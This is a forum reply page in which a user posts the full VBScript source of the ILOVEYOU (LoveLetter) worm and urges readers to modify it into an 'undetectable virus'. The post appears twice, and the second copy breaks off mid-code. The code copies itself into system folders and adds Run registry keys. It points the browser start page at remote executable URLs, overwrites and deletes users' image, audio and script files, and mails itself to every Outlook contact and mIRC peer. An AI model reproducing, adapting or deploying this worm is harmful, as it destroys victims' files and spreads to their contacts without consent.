Reply to thread

Message

<blockquote data-quote="sanzilla jackcat" data-source="post: 3888490" data-attributes="member: 131221">[code]e code balala vena eeva liyanna karana kattiyakuth innava thamai. eeth ithin eekata godak assembly language eka danagena inna epaaye.[/code]first of all the assembly language is not the language for computer virology. But it's a vast used language. There are many features inside it.There is a worm called millisa worm that inflects to the M$ office world files. It did a huge damage all over the world. So it's nothing regarding asm a bit even. so the most important thing is the idea behind is. What are the new techiniques it will uses to inflect. What are the techiniques it will use to hide himself. encryption xor like things....I will post the loveletter source code here ,,,, anyone can change this and make a perfect undetectable virus ,, so it's ups to you. Most of the sri lankan viruses are based on this original love letter.[code][COLOR=#cccccc]rem&nbsp; barok -loveletter(vbe) &lt;i hate go to school&gt;[/COLOR] [COLOR=#cccccc] rem by: spyder&nbsp; /&nbsp; ispyder@mail.com&nbsp; /&nbsp; @GRAMMERSoft Group&nbsp; /&nbsp; Manila,Philippines[/COLOR] &nbsp;On Error Resume Next &nbsp;dim fso,dirsystem,dirwin,dirtemp,eq,ctr,file,vbscopy,dow &nbsp;eq=&quot;&quot; &nbsp;ctr=0 &nbsp;Set fso = CreateObject(&quot;Scripting.FileSystemObject&quot;) &nbsp;set file = fso.OpenTextFile(WScript.ScriptFullname,1) &nbsp;vbscopy=file.ReadAll &nbsp;main() &nbsp;sub main() &nbsp;On Error Resume Next &nbsp;dim wscr,rr &nbsp;set wscr=CreateObject(&quot;WScript.Shell&quot;) &nbsp;rr=wscr.RegRead(&quot;HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout&quot;) &nbsp;if (rr&gt;=1) then &nbsp;wscr.RegWrite &quot;HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout&quot;,0,&quot;REG_DWORD&quot; &nbsp;end if &nbsp;Set dirwin = fso.GetSpecialFolder(0) &nbsp;Set dirsystem = fso.GetSpecialFolder(1) &nbsp;Set dirtemp = fso.GetSpecialFolder(2) &nbsp;Set c = fso.GetFile(WScript.ScriptFullName) &nbsp;c.Copy(dirsystem&amp;&quot;\MSKernel32.vbs&quot;) &nbsp;c.Copy(dirwin&amp;&quot;\Win32DLL.vbs&quot;) &nbsp;c.Copy(dirsystem&amp;&quot;\LOVE-LETTER-FOR-YOU.TXT.vbs&quot;) &nbsp;regruns() &nbsp;html() &nbsp;spreadtoemail() &nbsp;listadriv() &nbsp;end sub &nbsp;sub regruns() &nbsp;On Error Resume Next &nbsp;Dim num,downread &nbsp;regcreate &nbsp;&quot;HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MSKern el32&quot;,dirsystem&amp;&quot;\MSKernel32.vbs&quot; &nbsp;regcreate &nbsp;&quot;HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunService s\Win32DLL&quot;,dirwin&amp;&quot;\Win32DLL.vbs&quot; &nbsp;downread=&quot;&quot; &nbsp;downread=regget(&quot;HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Download Directory&quot;) &nbsp;if (downread=&quot;&quot;) then &nbsp;downread=&quot;c:\&quot; &nbsp;end if &nbsp;if (fileexist(dirsystem&amp;&quot;\WinFAT32.exe&quot;)=1) then &nbsp;Randomize &nbsp;num = Int((4 * Rnd) + 1) &nbsp;if num = 1 then &nbsp;regcreate &quot;HKCU\Software\Microsoft\Internet Explorer\Main\Start &nbsp;Page&quot;,&quot;http://www.skyinet.net/~young1s/HJKhjnwerhjkxcvytwertnMTFwetrdsfm &nbsp;hPnjw6587345gvsdf7679njbvYT/WIN-BUGSFIX.exe&quot; &nbsp;elseif num = 2 then &nbsp;regcreate &quot;HKCU\Software\Microsoft\Internet Explorer\Main\Start Page&quot;,&quot;http://www.skyinet.net/~angelcat/skladjflfdjghKJnwetryDGFikjUIyqw &nbsp;erWe546786324hjk4jnHHGbvbmKLJKjhkqj4w/WIN-BUGSFIX.exe&quot; &nbsp;elseif num = 3 then &nbsp;regcreate &quot;HKCU\Software\Microsoft\Internet Explorer\Main\Start &nbsp;Page&quot;,&quot;http://www.skyinet.net/~koichi/jf6TRjkcbGRpGqaq198vbFV5hfFEkbopBd &nbsp;QZnmPOhfgER67b3Vbvg/WIN-BUGSFIX.exe&quot; &nbsp;elseif num = 4 then &nbsp;regcreate &quot;HKCU\Software\Microsoft\Internet Explorer\Main\Start &nbsp;Page&quot;,&quot;http://www.skyinet.net/~chu/sdgfhjksdfjklNBmnfgkKLHjkqwtuHJBhAFSD &nbsp;GjkhYUgqwerasdjhPhjasfdglkNBhbqwebmznxcbvnmadshfgqw237461234iuy7thjg/WIN -BUGSFIX.exe&quot; &nbsp;end if &nbsp;end if &nbsp;if (fileexist(downread&amp;&quot;\WIN-BUGSFIX.exe&quot;)=0) then regcreate &nbsp;&quot;HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\WIN-BU GSFIX&quot;,downread&amp;&quot;\WIN-BUGSFIX.exe&quot; &nbsp;regcreate &quot;HKEY_CURRENT_USER\Software\Microsoft\Internet &nbsp;Explorer\Main\Start Page&quot;,&quot;about:blank&quot; &nbsp;end if &nbsp;end sub &nbsp;sub listadriv &nbsp;On Error Resume Next &nbsp;Dim d,dc,s &nbsp;Set dc = fso.Drives &nbsp;For Each d in dc &nbsp;If d.DriveType = 2 or d.DriveType=3 Then &nbsp;folderlist(d.path&amp;&quot;\&quot;) &nbsp;end if &nbsp;Next &nbsp;listadriv = s &nbsp;end sub &nbsp;sub infectfiles(folderspec) &nbsp;On Error Resume Next &nbsp;dim f,f1,fc,ext,ap,mircfname,s,bname,mp3 &nbsp;set f = fso.GetFolder(folderspec) &nbsp;set fc = f.Files &nbsp;for each f1 in fc &nbsp;ext=fso.GetExtensionName(f1.path) &nbsp;ext=lcase(ext) &nbsp;s=lcase(f1.name) &nbsp;if (ext=&quot;vbs&quot;) or (ext=&quot;vbe&quot;) then &nbsp;set ap=fso.OpenTextFile(f1.path,2,true) &nbsp;ap.write vbscopy &nbsp;ap.close &nbsp;elseif(ext=&quot;js&quot;) or (ext=&quot;jse&quot;) or (ext=&quot;css&quot;) or (ext=&quot;wsh&quot;) or (ext=&quot;sct&quot;) or (ext=&quot;hta&quot;) then &nbsp;set ap=fso.OpenTextFile(f1.path,2,true) &nbsp;ap.write vbscopy &nbsp;ap.close &nbsp;bname=fso.GetBaseName(f1.path) &nbsp;set cop=fso.GetFile(f1.path) &nbsp;cop.copy(folderspec&amp;&quot;\&quot;&amp;bname&amp;&quot;.vbs&quot;) fso.DeleteFile(f1.path) &nbsp;elseif(ext=&quot;jpg&quot;) or (ext=&quot;jpeg&quot;) then &nbsp;set ap=fso.OpenTextFile(f1.path,2,true) &nbsp;ap.write vbscopy &nbsp;ap.close &nbsp;set cop=fso.GetFile(f1.path) &nbsp;cop.copy(f1.path&amp;&quot;.vbs&quot;) &nbsp;fso.DeleteFile(f1.path) &nbsp;elseif(ext=&quot;mp3&quot;) or (ext=&quot;mp2&quot;) then &nbsp;set mp3=fso.CreateTextFile(f1.path&amp;&quot;.vbs&quot;) &nbsp;mp3.write vbscopy &nbsp;mp3.close &nbsp;set att=fso.GetFile(f1.path) &nbsp;att.attributes=att.attributes+2 &nbsp;end if &nbsp;if (eq&lt;&gt;folderspec) then &nbsp;if (s=&quot;mirc32.exe&quot;) or (s=&quot;mlink32.exe&quot;) or (s=&quot;mirc.ini&quot;) or (s=&quot;script.ini&quot;) or (s=&quot;mirc.hlp&quot;) then &nbsp;set scriptini=fso.CreateTextFile(folderspec&amp;&quot;\script.ini&quot;) scriptini.WriteLine &quot;[script]&quot; &nbsp;scriptini.WriteLine &quot;;mIRC Script&quot; &nbsp;scriptini.WriteLine &quot;;&nbsp; Please dont edit this script... mIRC will corrupt, if mIRC will&quot; &nbsp;scriptini.WriteLine &quot;&nbsp; &nbsp; corrupt... WINDOWS will affect and will not run correctly. thanks&quot; &nbsp;scriptini.WriteLine &quot;;&quot; &nbsp;scriptini.WriteLine &quot;;Khaled Mardam-Bey&quot; &nbsp;scriptini.WriteLine &quot;;http://www.mirc.com&quot; &nbsp;scriptini.WriteLine &quot;;&quot; &nbsp;scriptini.WriteLine &quot;n0=on 1:JOIN:#:{&quot; &nbsp;scriptini.WriteLine &quot;n1=&nbsp; /if ( $nick == $me ) { halt }&quot; scriptini.WriteLine &quot;n2=&nbsp; /.dcc send $nick &nbsp;&quot;&amp;dirsystem&amp;&quot;\LOVE-LETTER-FOR-YOU.HTM&quot; &nbsp;scriptini.WriteLine &quot;n3=}&quot; &nbsp;scriptini.close &nbsp;eq=folderspec &nbsp;end if &nbsp;end if &nbsp;next &nbsp;end sub &nbsp;sub folderlist(folderspec) &nbsp;On Error Resume Next &nbsp;dim f,f1,sf &nbsp;set f = fso.GetFolder(folderspec) &nbsp;set sf = f.SubFolders &nbsp;for each f1 in sf &nbsp;infectfiles(f1.path) &nbsp;folderlist(f1.path) &nbsp;next &nbsp;end sub &nbsp;sub regcreate(regkey,regvalue) &nbsp;Set regedit = CreateObject(&quot;WScript.Shell&quot;) &nbsp;regedit.RegWrite regkey,regvalue &nbsp;end sub &nbsp;function regget(value) &nbsp;Set regedit = CreateObject(&quot;WScript.Shell&quot;) &nbsp;regget=regedit.RegRead(value) &nbsp;end function &nbsp;function fileexist(filespec) &nbsp;On Error Resume Next &nbsp;dim msg &nbsp;if (fso.FileExists(filespec)) Then &nbsp;msg = 0 &nbsp;else &nbsp;msg = 1 &nbsp;end if &nbsp;fileexist = msg &nbsp;end function &nbsp;function folderexist(folderspec) &nbsp;On Error Resume Next &nbsp;dim msg &nbsp;if (fso.GetFolderExists(folderspec)) then &nbsp;msg = 0 &nbsp;else &nbsp;msg = 1 &nbsp;end if &nbsp;fileexist = msg &nbsp;end function &nbsp;sub spreadtoemail() &nbsp;On Error Resume Next &nbsp;dim x,a,ctrlists,ctrentries,malead,b,regedit,regv,regad &nbsp;set regedit=CreateObject(&quot;WScript.Shell&quot;) &nbsp;set out=WScript.CreateObject(&quot;Outlook.Application&quot;) &nbsp;set mapi=out.GetNameSpace(&quot;MAPI&quot;) &nbsp;for ctrlists=1 to mapi.AddressLists.Count &nbsp;set a=mapi.AddressLists(ctrlists) &nbsp;x=1 &nbsp;regv=regedit.RegRead(&quot;HKEY_CURRENT_USER\Software\Microsoft\WAB\&quot;&amp;a) if (regv=&quot;&quot;) then &nbsp;regv=1 &nbsp;end if &nbsp;if (int(a.AddressEntries.Count)&gt;int(regv)) then &nbsp;for ctrentries=1 to a.AddressEntries.Count &nbsp;malead=a.AddressEntries(x) &nbsp;regad=&quot;&quot; &nbsp;regad=regedit.RegRead(&quot;HKEY_CURRENT_USER\Software\Microsoft\WAB\&quot;&amp;malead ) &nbsp;if (regad=&quot;&quot;) then &nbsp;set male=out.CreateItem(0) &nbsp;male.Recipients.Add(malead) &nbsp;male.Subject = &quot;ILOVEYOU&quot; &nbsp;male.Body = vbcrlf&amp;&quot;kindly check the attached LOVELETTER coming from me.&quot; &nbsp;male.Attachments.Add(dirsystem&amp;&quot;\LOVE-LETTER-FOR-YOU.TXT.vbs&quot;) male.Send &nbsp;regedit.RegWrite &nbsp;&quot;HKEY_CURRENT_USER\Software\Microsoft\WAB\&quot;&amp;malead,1,&quot;REG_DWORD&quot; end if &nbsp;x=x+1 &nbsp;next &nbsp;regedit.RegWrite &nbsp;&quot;HKEY_CURRENT_USER\Software\Microsoft\WAB\&quot;&amp;a,a.AddressEntries.Count else &nbsp;regedit.RegWrite &nbsp;&quot;HKEY_CURRENT_USER\Software\Microsoft\WAB\&quot;&amp;a,a.AddressEntries.Count end if &nbsp;next &nbsp;Set out=Nothing &nbsp;Set mapi=Nothing &nbsp;end sub &nbsp;sub html &nbsp;On Error Resume Next &nbsp;dim lines,n,dta1,dta2,dt1,dt2,dt3,dt4,l1,dt5,dt6 &nbsp;dta1=&quot;&lt;HTML&gt;&lt;HEAD&gt;&lt;TITLE&gt;LOVELETTER - HTML&lt;?-?TITLE&gt;&lt;META NAME=@-@Generator@-@ CONTENT=@-@BAROK VBS - &nbsp;LOVELETTER@-@&gt;&quot;&amp;vbcrlf&amp; _ &quot;&lt;META NAME=@-@Author@-@ CONTENT=@-@spyder ?-? ispyder@mail.com ?-? &nbsp;@GRAMMERSoft Group ?-? Manila, Philippines ?-? March 2000@-@&gt;&quot;&amp;vbcrlf&amp; _ &quot;&lt;META NAME=@-@Description@-@ &nbsp;CONTENT=@-@simple but i think this is good...@-@&gt;&quot;&amp;vbcrlf&amp; _ &nbsp;&quot;&lt;?-?HEAD&gt;&lt;BODY &nbsp;ONMOUSEOUT=@-@window.name=#-#main#-#;window.open(#-#LOVE-LETTER-FOR-YOU. &nbsp;HTM#-#,#-#main#-#)@-@ &quot;&amp;vbcrlf&amp; _ &nbsp;&quot;ONKEYDOWN=@-@window.name=#-#main#-#;window.open(#-#LOVE-LETTER-FOR-YOU. HTM#-#,#-#main#-#)@-@ &nbsp;BGPROPERTIES=@-@fixed@-@ &nbsp;BGCOLOR=@-@#FF9933@-@&gt;&quot;&amp;vbcrlf&amp; _ &nbsp;&quot;&lt;CENTER&gt;&lt;p&gt;This HTML file need ActiveX Control&lt;?-?p&gt;&lt;p&gt;To Enable to read this HTML file&lt;BR&gt;- Please press #-#YES#-# button to &nbsp;Enable ActiveX&lt;?-?p&gt;&quot;&amp;vbcrlf&amp; _ &nbsp;&quot;&lt;?-?CENTER&gt;&lt;MARQUEE LOOP=@-@infinite@-@ &nbsp;BGCOLOR=@-@yellow@-@&gt;----------z--------------------z----------&lt;?-?MARQU EE&gt; &quot;&amp;vbcrlf&amp; _ &nbsp;&quot;&lt;?-?BODY&gt;&lt;?-?HTML&gt;&quot;&amp;vbcrlf&amp; _ &nbsp;&quot;&lt;SCRIPT language=@-@JScript@-@&gt;&quot;&amp;vbcrlf&amp; _ &quot;&lt;!--?-??-?&quot;&amp;vbcrlf&amp; _ &nbsp;&quot;if (window.screen){var wi=screen.availWidth;var &nbsp;hi=screen.availHeight;window.moveTo(0,0);window.resizeTo(wi,hi);}&quot;&amp;vbcrl f&amp; _ &nbsp;&quot;?-??-?--&gt;&quot;&amp;vbcrlf&amp; _ &nbsp;&quot;&lt;?-?SCRIPT&gt;&quot;&amp;vbcrlf&amp; _ &nbsp;&quot;&lt;SCRIPT LANGUAGE=@-@VBScript@-@&gt;&quot;&amp;vbcrlf&amp; _ &quot;&lt;!--&quot;&amp;vbcrlf&amp; _ &nbsp;&quot;on error resume next&quot;&amp;vbcrlf&amp; _ &nbsp;&quot;dim fso,dirsystem,wri,code,code2,code3,code4,aw,regdit&quot;&amp;vbcrlf&amp; _ &quot;aw=1&quot;&amp;vbcrlf&amp; _ &nbsp;&quot;code=&quot; &nbsp;dta2=&quot;set fso=CreateObject(@-@Scripting.FileSystemObject@-@)&quot;&amp;vbcrlf&amp; _ &nbsp;&quot;set dirsystem=fso.GetSpecialFolder(1)&quot;&amp;vbcrlf&amp; _ &quot;code2=replace(code,chr(91)&amp;chr(45)&amp;chr(91),chr(39))&quot;&amp;vbcrlf&amp; _ &nbsp;&quot;code3=replace(code2,chr(93)&amp;chr(45)&amp;chr(93),chr(34))&quot;&amp;vbcrlf&amp; _ &quot;code4=replace(code3,chr(37)&amp;chr(45)&amp;chr(37),chr(92))&quot;&amp;vbcrlf&amp; _ &quot;set &nbsp;wri=fso.CreateTextFile(dirsystem&amp;@-@^-^MSKernel32.vbs@-@)&quot;&amp;vbcrlf&amp; _ &nbsp;&quot;wri.write code4&quot;&amp;vbcrlf&amp; _ &nbsp;&quot;wri.close&quot;&amp;vbcrlf&amp; _ &nbsp;&quot;if (fso.FileExists(dirsystem&amp;@-@^-^MSKernel32.vbs@-@)) then&quot;&amp;vbcrlf&amp; _ &quot;if (err.number=424) then&quot;&amp;vbcrlf&amp; _ &nbsp;&quot;aw=0&quot;&amp;vbcrlf&amp; _ &nbsp;&quot;end if&quot;&amp;vbcrlf&amp; _ &nbsp;&quot;if (aw=1) then&quot;&amp;vbcrlf&amp; _ &nbsp;&quot;document.write @-@ERROR: can#-#t initialize ActiveX@-@&quot;&amp;vbcrlf&amp; _ &quot;window.close&quot;&amp;vbcrlf&amp; _ &nbsp;&quot;end if&quot;&amp;vbcrlf&amp; _ &nbsp;&quot;end if&quot;&amp;vbcrlf&amp; _ &nbsp;&quot;Set regedit = CreateObject(@-@WScript.Shell@-@)&quot;&amp;vbcrlf&amp; _ &nbsp;&quot;regedit.RegWrite &nbsp;@-@HKEY_LOCAL_MACHINE^-^Software^-^Microsoft^-^Windows^-^CurrentVersion^ &nbsp;-^Run^-^MSKernel32@-@,dirsystem&amp;@-@^-^MSKernel32.vbs@-@&quot;&amp;vbcrlf&amp; _ &quot;?-??-?--&gt;&quot;&amp;vbcrlf&amp; _ &nbsp;&quot;&lt;?-?SCRIPT&gt;&quot; &nbsp;dt1=replace(dta1,chr(35)&amp;chr(45)&amp;chr(35),&quot;'&quot;) &nbsp;dt1=replace(dt1,chr(64)&amp;chr(45)&amp;chr(64),&quot;&quot;&quot;&quot;) dt4=replace(dt1,chr(63)&amp;chr(45)&amp;chr(63),&quot;/&quot;) &nbsp;dt5=replace(dt4,chr(94)&amp;chr(45)&amp;chr(94),&quot;\&quot;) &nbsp;dt2=replace(dta2,chr(35)&amp;chr(45)&amp;chr(35),&quot;'&quot;) &nbsp;dt2=replace(dt2,chr(64)&amp;chr(45)&amp;chr(64),&quot;&quot;&quot;&quot;) dt3=replace(dt2,chr(63)&amp;chr(45)&amp;chr(63),&quot;/&quot;) &nbsp;dt6=replace(dt3,chr(94)&amp;chr(45)&amp;chr(94),&quot;\&quot;) &nbsp;set fso=CreateObject(&quot;Scripting.FileSystemObject&quot;) &nbsp;set c=fso.OpenTextFile(WScript.ScriptFullName,1) &nbsp;lines=Split(c.ReadAll,vbcrlf) &nbsp;l1=ubound(lines) &nbsp;for n=0 to ubound(lines) &nbsp;lines(n)=replace(lines(n),&quot;'&quot;,chr(91)+chr(45)+chr(91)) lines(n)=replace(lines(n),&quot;&quot;&quot;&quot;,chr(93)+chr(45)+chr(93)) &nbsp;lines(n)=replace(lines(n),&quot;\&quot;,chr(37)+chr(45)+chr(37)) if (l1=n) then &nbsp;lines(n)=chr(34)+lines(n)+chr(34) &nbsp;else &nbsp;lines(n)=chr(34)+lines(n)+chr(34)&amp;&quot;&amp;vbcrlf&amp; _&quot; end if &nbsp;next &nbsp;set b=fso.CreateTextFile(dirsystem+&quot;\LOVE-LETTER-FOR-YOU.HTM&quot;) b.close &nbsp;set d=fso.OpenTextFile(dirsystem+&quot;\LOVE-LETTER-FOR-YOU.HTM&quot;,2) d.write dt5 &nbsp;d.write join(lines,vbcrlf) &nbsp;d.write vbcrlf &nbsp;d.write dt6 &nbsp;d.close &nbsp;end sub[/code]so if you know vbs and you have a fresh idea , you are a good virus writer. Yes.anyway did you guys heard about a virus that inflect the facebook accounts , it's actually a worm . It uses a XSS hole in the facebookto execute the aribratary javascript code and inflect. It inflected to the huge number of facebook accounts. so computer viruses are not only limited to the desktop viruses. Think different and get an new idea is the most important thing as I feel.anyway someone who wish to start explore the computer virology this book is good ...<a href="http://www.flazx.com/ebook2723.php" target="_blank">http://www.flazx.com/ebook2723.php</a>Publisher&nbsp; Addison-Wesley&nbsp; Author(s)&nbsp; Peter Szor&nbsp; &nbsp; ISBN&nbsp; 0321304543happy reading.</blockquote>

[QUOTE="sanzilla jackcat, post: 3888490, member: 131221"] [code]e code balala vena eeva liyanna karana kattiyakuth innava thamai. eeth ithin eekata godak assembly language eka danagena inna epaaye.[/code] first of all the assembly language is not the language for computer virology. But it's a vast used language. There are many features inside it.There is a worm called millisa worm that inflects to the M$ office world files. It did a huge damage all over the world. So it's nothing regarding asm a bit even. so the most important thing is the idea behind is. What are the new techiniques it will uses to inflect. What are the techiniques it will use to hide himself. encryption xor like things.... I will post the loveletter source code here ,,,, anyone can change this and make a perfect undetectable virus ,, so it's ups to you. Most of the sri lankan viruses are based on this original love letter. [code] [COLOR=#cccccc]rem barok -loveletter(vbe) [/COLOR] [COLOR=#cccccc] rem by: spyder / ispyder@mail.com / @GRAMMERSoft Group / Manila,Philippines[/COLOR] On Error Resume Next dim fso,dirsystem,dirwin,dirtemp,eq,ctr,file,vbscopy,dow eq="" ctr=0 Set fso = CreateObject("Scripting.FileSystemObject") set file = fso.OpenTextFile(WScript.ScriptFullname,1) vbscopy=file.ReadAll main() sub main() On Error Resume Next dim wscr,rr set wscr=CreateObject("WScript.Shell") rr=wscr.RegRead("HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout") if (rr>=1) then wscr.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout",0,"REG_DWORD" end if Set dirwin = fso.GetSpecialFolder(0) Set dirsystem = fso.GetSpecialFolder(1) Set dirtemp = fso.GetSpecialFolder(2) Set c = fso.GetFile(WScript.ScriptFullName) c.Copy(dirsystem&"\MSKernel32.vbs") c.Copy(dirwin&"\Win32DLL.vbs") c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs") regruns() html() spreadtoemail() listadriv() end sub sub regruns() On Error Resume Next Dim num,downread regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MSKern el32",dirsystem&"\MSKernel32.vbs" regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunService s\Win32DLL",dirwin&"\Win32DLL.vbs" downread="" downread=regget("HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Download Directory") if (downread="") then downread="c:\" end if if (fileexist(dirsystem&"\WinFAT32.exe")=1) then Randomize num = Int((4 * Rnd) + 1) if num = 1 then regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~young1s/HJKhjnwerhjkxcvytwertnMTFwetrdsfm hPnjw6587345gvsdf7679njbvYT/WIN-BUGSFIX.exe" elseif num = 2 then regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~angelcat/skladjflfdjghKJnwetryDGFikjUIyqw erWe546786324hjk4jnHHGbvbmKLJKjhkqj4w/WIN-BUGSFIX.exe" elseif num = 3 then regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~koichi/jf6TRjkcbGRpGqaq198vbFV5hfFEkbopBd QZnmPOhfgER67b3Vbvg/WIN-BUGSFIX.exe" elseif num = 4 then regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~chu/sdgfhjksdfjklNBmnfgkKLHjkqwtuHJBhAFSD GjkhYUgqwerasdjhPhjasfdglkNBhbqwebmznxcbvnmadshfgqw237461234iuy7thjg/WIN -BUGSFIX.exe" end if end if if (fileexist(downread&"\WIN-BUGSFIX.exe")=0) then regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\WIN-BU GSFIX",downread&"\WIN-BUGSFIX.exe" regcreate "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page","about:blank" end if end sub sub listadriv On Error Resume Next Dim d,dc,s Set dc = fso.Drives For Each d in dc If d.DriveType = 2 or d.DriveType=3 Then folderlist(d.path&"\") end if Next listadriv = s end sub sub infectfiles(folderspec) On Error Resume Next dim f,f1,fc,ext,ap,mircfname,s,bname,mp3 set f = fso.GetFolder(folderspec) set fc = f.Files for each f1 in fc ext=fso.GetExtensionName(f1.path) ext=lcase(ext) s=lcase(f1.name) if (ext="vbs") or (ext="vbe") then set ap=fso.OpenTextFile(f1.path,2,true) ap.write vbscopy ap.close elseif(ext="js") or (ext="jse") or (ext="css") or (ext="wsh") or (ext="sct") or (ext="hta") then set ap=fso.OpenTextFile(f1.path,2,true) ap.write vbscopy ap.close bname=fso.GetBaseName(f1.path) set cop=fso.GetFile(f1.path) cop.copy(folderspec&"\"&bname&".vbs") fso.DeleteFile(f1.path) elseif(ext="jpg") or (ext="jpeg") then set ap=fso.OpenTextFile(f1.path,2,true) ap.write vbscopy ap.close set cop=fso.GetFile(f1.path) cop.copy(f1.path&".vbs") fso.DeleteFile(f1.path) elseif(ext="mp3") or (ext="mp2") then set mp3=fso.CreateTextFile(f1.path&".vbs") mp3.write vbscopy mp3.close set att=fso.GetFile(f1.path) att.attributes=att.attributes+2 end if if (eq<>folderspec) then if (s="mirc32.exe") or (s="mlink32.exe") or (s="mirc.ini") or (s="script.ini") or (s="mirc.hlp") then set scriptini=fso.CreateTextFile(folderspec&"\script.ini") scriptini.WriteLine "[script]" scriptini.WriteLine ";mIRC Script" scriptini.WriteLine "; Please dont edit this script... mIRC will corrupt, if mIRC will" scriptini.WriteLine " corrupt... WINDOWS will affect and will not run correctly. thanks" scriptini.WriteLine ";" scriptini.WriteLine ";Khaled Mardam-Bey" scriptini.WriteLine ";http://www.mirc.com" scriptini.WriteLine ";" scriptini.WriteLine "n0=on 1:JOIN:#:{" scriptini.WriteLine "n1= /if ( $nick == $me ) { halt }" scriptini.WriteLine "n2= /.dcc send $nick "&dirsystem&"\LOVE-LETTER-FOR-YOU.HTM" scriptini.WriteLine "n3=}" scriptini.close eq=folderspec end if end if next end sub sub folderlist(folderspec) On Error Resume Next dim f,f1,sf set f = fso.GetFolder(folderspec) set sf = f.SubFolders for each f1 in sf infectfiles(f1.path) folderlist(f1.path) next end sub sub regcreate(regkey,regvalue) Set regedit = CreateObject("WScript.Shell") regedit.RegWrite regkey,regvalue end sub function regget(value) Set regedit = CreateObject("WScript.Shell") regget=regedit.RegRead(value) end function function fileexist(filespec) On Error Resume Next dim msg if (fso.FileExists(filespec)) Then msg = 0 else msg = 1 end if fileexist = msg end function function folderexist(folderspec) On Error Resume Next dim msg if (fso.GetFolderExists(folderspec)) then msg = 0 else msg = 1 end if fileexist = msg end function sub spreadtoemail() On Error Resume Next dim x,a,ctrlists,ctrentries,malead,b,regedit,regv,regad set regedit=CreateObject("WScript.Shell") set out=WScript.CreateObject("Outlook.Application") set mapi=out.GetNameSpace("MAPI") for ctrlists=1 to mapi.AddressLists.Count set a=mapi.AddressLists(ctrlists) x=1 regv=regedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a) if (regv="") then regv=1 end if if (int(a.AddressEntries.Count)>int(regv)) then for ctrentries=1 to a.AddressEntries.Count malead=a.AddressEntries(x) regad="" regad=regedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\"&malead ) if (regad="") then set male=out.CreateItem(0) male.Recipients.Add(malead) male.Subject = "ILOVEYOU" male.Body = vbcrlf&"kindly check the attached LOVELETTER coming from me." male.Attachments.Add(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs") male.Send regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&malead,1,"REG_DWORD" end if x=x+1 next regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.AddressEntries.Count else regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.AddressEntries.Count end if next Set out=Nothing Set mapi=Nothing end sub sub html On Error Resume Next dim lines,n,dta1,dta2,dt1,dt2,dt3,dt4,l1,dt5,dt6 dta1="<HTML><HEAD><TITLE>LOVELETTER - HTML<?-?TITLE><META NAME=@-@Generator@-@ CONTENT=@-@BAROK VBS - LOVELETTER@-@>"&vbcrlf& _ "<META NAME=@-@Author@-@ CONTENT=@-@spyder ?-? ispyder@mail.com ?-? @GRAMMERSoft Group ?-? Manila, Philippines ?-? March 2000@-@>"&vbcrlf& _ "<META NAME=@-@Description@-@ CONTENT=@-@simple but i think this is good...@-@>"&vbcrlf& _ "<?-?HEAD><BODY ONMOUSEOUT=@-@window.name=#-#main#-#;window.open(#-#LOVE-LETTER-FOR-YOU. HTM#-#,#-#main#-#)@-@ "&vbcrlf& _ "ONKEYDOWN=@-@window.name=#-#main#-#;window.open(#-#LOVE-LETTER-FOR-YOU. HTM#-#,#-#main#-#)@-@ BGPROPERTIES=@-@fixed@-@ BGCOLOR=@-@#FF9933@-@>"&vbcrlf& _ "<CENTER>This HTML file need ActiveX Control<?-?p>To Enable to read this HTML file - Please press #-#YES#-# button to Enable ActiveX<?-?p>"&vbcrlf& _ "<?-?CENTER><MARQUEE LOOP=@-@infinite@-@ BGCOLOR=@-@yellow@-@>----------z--------------------z----------<?-?MARQU EE> "&vbcrlf& _ "<?-?BODY><?-?HTML>"&vbcrlf& _ "<SCRIPT language=@-@JScript@-@>"&vbcrlf& _ ""&vbcrlf& _ "<?-?SCRIPT>"&vbcrlf& _ "<SCRIPT LANGUAGE=@-@VBScript@-@>"&vbcrlf& _ ""&vbcrlf& _ "<?-?SCRIPT>" dt1=replace(dta1,chr(35)&chr(45)&chr(35),"'") dt1=replace(dt1,chr(64)&chr(45)&chr(64),"""") dt4=replace(dt1,chr(63)&chr(45)&chr(63),"/") dt5=replace(dt4,chr(94)&chr(45)&chr(94),"\") dt2=replace(dta2,chr(35)&chr(45)&chr(35),"'") dt2=replace(dt2,chr(64)&chr(45)&chr(64),"""") dt3=replace(dt2,chr(63)&chr(45)&chr(63),"/") dt6=replace(dt3,chr(94)&chr(45)&chr(94),"\") set fso=CreateObject("Scripting.FileSystemObject") set c=fso.OpenTextFile(WScript.ScriptFullName,1) lines=Split(c.ReadAll,vbcrlf) l1=ubound(lines) for n=0 to ubound(lines) lines(n)=replace(lines(n),"'",chr(91)+chr(45)+chr(91)) lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93)) lines(n)=replace(lines(n),"\",chr(37)+chr(45)+chr(37)) if (l1=n) then lines(n)=chr(34)+lines(n)+chr(34) else 